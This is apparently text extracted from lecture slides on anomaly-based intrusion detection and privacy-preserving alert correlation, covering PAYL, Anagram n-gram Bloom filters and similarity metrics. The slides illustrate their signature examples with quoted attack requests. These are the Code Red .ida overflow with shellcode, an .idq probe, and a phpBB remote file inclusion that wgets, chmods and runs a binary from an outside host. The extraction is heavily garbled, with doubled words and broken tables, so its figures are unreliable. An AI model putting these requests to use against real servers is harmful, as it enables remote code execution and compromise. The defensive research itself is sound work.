4, 13, 453, 1460, 1460, 649
4, 375, 1460, 1460, 740
4, 13, 362, 91, 1460, 1460, 6491448, 1448, 1143
OutgoingIncoming
Code Red (total 4039 bytes)
Different Different fragmentation for CR fragmentation for CR
and CRIIand CRII
82
MetricMetric Detect Detect propagatipropagationon
False False alertsalerts
SESE NoNo NoNo
LCS(0.5)LCS(0.5) Yes Yes NoNo
LCSeq(0.LCSeq(0.5)5)
YesYes NoNo
Results of correlation Results of correlation for different metricsfor different metrics
The number in the parenthesis is the The number in the parenthesis is the threshold setting for similarity score to threshold setting for similarity score to decide whether a propagation has occurreddecide whether a propagation has occurred
Return to main
83
Data DiversityData Diversity
Example byte distribution for payload length 536 of port 80 for the three sites.
84
EX, WEX, W1448, 1448, 0.78960.7896
1460, 1460, 0.78510.7851
216, 216, 0.62410.6241
EX, W1EX, W11460, 1460, 0.97460.9746
1448, 1448, 0.87310.8731
536, 536, 0.55400.5540
W, WW, W892, 892, 0.75020.7502
1460, 1460, 0.74560.7456
1448, 1448, 0.71220.7122
PAYL: for each pair of sites, the 3 packet lengths with the largest Manhattan distance between their byte distribution.
Dataset A
Dataset B
Common 5-grams
Common Perc(%)
EX (509347)
W (953345) 129468 17.5%
EX (509347)
W1 (974292) 99366 13.4%
W1 (974292)
W (953345) 454586 47.2%
Anagram: the number of unique 5-grams in dataset W, W1 and EX, and the common 5-grams numbers between each pair of sites.
Back
85
Testing methodologyTesting methodology Three sets of trafficThree sets of traffic
www1www1 and and www2www2: Columbia webservers, 100 : Columbia webservers, 100 packets eachpackets each
Malicious packet dataset, 56 packets eachMalicious packet dataset, 56 packets each Known Ground TruthKnown Ground Truth
Arranged into three sets of pairsArranged into three sets of pairs 10,000 “good vs. good”10,000 “good vs. good” 1,540 “bad vs. bad”1,540 “bad vs. bad” 5,600 “good vs. bad” between 5,600 “good vs. bad” between www1www1 and the and the
malicious datasetmalicious dataset CompareCompare
SimilaritySimilarity of the approaches of the approaches EffectivenessEffectiveness in correlating in correlating Ability to generate Ability to generate signaturessignatures
86
Similarity – direct string Similarity – direct string comparisoncomparison
0 10 20 30 40 50 60 70 800
0.1
0.2
0.3
0.4
0.5
0.6
0.7
0.8
0.9
1
Sim
ilarit
y S
core
Raw LCS
Zstr LCS
Raw LCSeq
Raw ED
Manhattan Distance
Zstr LCSeq
Zstr ED
High-level view of High-level view of score similaritiesscore similarities
Most of the Most of the techniques are techniques are similar, similar, exceptexcept LCS LCS (vulnerable to slight (vulnerable to slight differences)differences)
ED and LCSeq very ED and LCSeq very similarsimilar
N-gram techniques N-gram techniques not included not included (doesn’t compute (doesn’t compute similarity over entire similarity over entire packet datagram)packet datagram)Similarity score, 80 random
To compare the difference more precisely, To compare the difference more precisely, normalizenormalize and compare scores and compare scores Compute similarity score vectors Compute similarity score vectors VVA A ,, V VBB
Match their mediansMatch their medians Scale ranges proportionally so min and max Scale ranges proportionally so min and max
values matchvalues match Manhattan distanceManhattan distance then computed between then computed between
the vectorsthe vectors Each privacy-enabled technique compared Each privacy-enabled technique compared
against Raw-LCSeq (baseline)against Raw-LCSeq (baseline)
88
Similarity of packets (III)Similarity of packets (III)
TypeType Raw-Raw-LCSLCS
Raw-Raw-EDED
MDMD ZStr-ZStr-LCSLCS
ZStr-ZStr-LCSeLCSe
qq
ZStr-ZStr-EDED
G-DG-D .094.09488
.033.03366
.066.06699
.207.20799
.079.07944
.066.06677
B-BB-B .050.05088
.044.04411
.065.06533
.039.03999
.026.02633
.066.06699
G-BG-B .025.02511
.024.02411
.011.01100
.031.03100
.019.01911
.023.02333
Unsurprisingly, Raw-ED closest to Raw-LCSeq Unsurprisingly, Raw-ED closest to Raw-LCSeq All privacy-preserving methods are closeAll privacy-preserving methods are close when when
correlating pairs including attack traffic; may be correlating pairs including attack traffic; may be leveraging difference between byte distributionsleveraging difference between byte distributions Manhattan distance between packet freq Manhattan distance between packet freq
GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0\x0d\n.
GET /notarealfile.idq?UOIRJVFJWPOIVNBUNIVUWIFOJIVNNZCIVIVIGJBMOMKRNVEWIFUVNVGFWERIOUNVUNWIUNFOWIFGITTOOWENVJSNVSFDVIRJGOGTNGTOWGTFGPGLKJFGOIRWTPOIREPTOEIGPOEWKFVVNKFVVSDNVFDSFNKVFKGTRPOPOGOPIRWOIRNNMSKVFPOSVODIOREOITIGTNJGTBNVNFDFKLVSPOERFROGDFGKDFGGOTDNKPRJNJIDH%u1234DSPPOITEBFBWEJFBHREWJFHFRG=bla HTTP/1.0\x0d\n.
The anomalous n-grams of suspicious The anomalous n-grams of suspicious payload are stored in a Bloom filter, and payload are stored in a Bloom filter, and exchanged among sitesexchanged among sites
By checking the n-grams of local alerts By checking the n-grams of local alerts against the Bloom filter alert, it’s easy to against the Bloom filter alert, it’s easy to tell how similar the alerts are to each tell how similar the alerts are to each otherother The common malicious n-grams can be used The common malicious n-grams can be used
for general signature generation, even for for general signature generation, even for polymorphic wormspolymorphic worms
Privacy preserving with no loss of Privacy preserving with no loss of accuracyaccuracy
Anagram not only detects suspicious Anagram not only detects suspicious packets, it also identifies the packets, it also identifies the corresponding malicious n-grams!corresponding malicious n-grams!
These n-grams are good targets for These n-grams are good targets for further analysis and signature further analysis and signature generationgeneration
The set of n-grams is order-The set of n-grams is order-independent. Attack vector independent. Attack vector reordering will fail.reordering will fail.
92
Anagram flattened signature Anagram flattened signature for attackfor attack
GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo|..HTTP/1.1.Host:.128.59.16.26.User‑Agent:.Mozilla/4.0.(compatible;.MSIE.6.0;.Windows.NT.5.1;)..